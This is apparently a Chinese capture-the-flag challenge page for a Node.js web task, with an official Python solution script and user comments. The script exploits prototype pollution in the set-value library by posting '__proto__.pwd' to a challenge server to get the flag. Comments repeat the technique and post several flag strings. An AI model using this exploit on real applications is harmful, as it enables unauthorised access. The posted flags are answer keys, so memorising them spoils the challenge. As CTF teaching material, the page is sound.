sodirty

sodirty

平台 WEB 已通过

题目作者: Jesen

一　　血: ‌‌‌‌‌zhong3

一血奖励: 4金币

解　　决: 839

提　　示: 垃圾题目，大表哥们不要骂

站长题解:

const setFn = require('set-value'); 存在 node.js 原型链污染，参考 https://cloud.tencent.com/developer/article/2288287

import requests
import random
from bs4 import BeautifulSoup
import re
import base64

s = requests.session() #保持同一个会话

def reg(url):
    url = url+"reg"
    r = s.get(url)
    print(r.text)

def update(url, data):
    url = url+"update"
    print(url)
    r = s.post(url, data=data)
    print(r.text)

def getflag(url, data):
    url = url + "getflag"
    r = s.post(url, data=data)
    print(r.text)

# 注册用户
url = "http://114.67.175.224:17157/"
reg(url)

# 更新年龄
data = {"attrkey":"age","attrval":"20"}
update(url, data)

# 原型链污染，给__proto__.pwd赋值123
data = {"attrkey":"__proto__.pwd","attrval":"123"}
update(url, data)

# 更新密码
data = {"password":"123","key":"pwd"}
getflag(url, data)

去做题

Daniel2023 @ 2024-03-07 23:20:48 👍1

/www.zip拿到源码。提示：js原型链污染。 flag{b61d0ade304ea75b0c837ec73e1dfd12}

vchopin @ 2023-12-07 23:20:48 👍0

setFN原型链污染，关键点： data = { 'attrkey':'__proto__.vchopin', 'attrval':'password' } 原型后边的参数不要写password，因为Admin已经创建了，password不会改变，重新写个不一样的变量，在getFlag的时候调用就可以了

老渡真的不懂 @ 2023-10-07 23:20:48 👍0

服务器什么鬼啊，根本连接不上

kaikaixinxin @ 2023-08-07 23:20:48 👍1

为什么我dirsearch扫不到www.zip。/update，/getflag页面也没有，访问直接是 not found

wxy1343 @ 2023-06-07 23:20:48 👍0

flag{cc5bcfb805c2b4aecbbdf658d5862856}

Vio1et @ 2023-06-07 23:20:48 👍0

貌似用bp会有点问题

单片眼镜 @ 2023-06-07 23:20:48 👍0

flag{3f058b28513882654958388bb609b667}

Striker123456 @ 2023-06-07 23:20:48 👍0

不会前端不能做安全吗，可恶

哎嘿嘿1314 @ 2023-06-07 23:20:48 👍0

这个有点东西的

bigbox @ 2023-06-07 23:20:48 👍0

没有 www.zip这个目录。wtf？

Jesen @ 2023-06-07 23:20:48 👍0

测试正常哦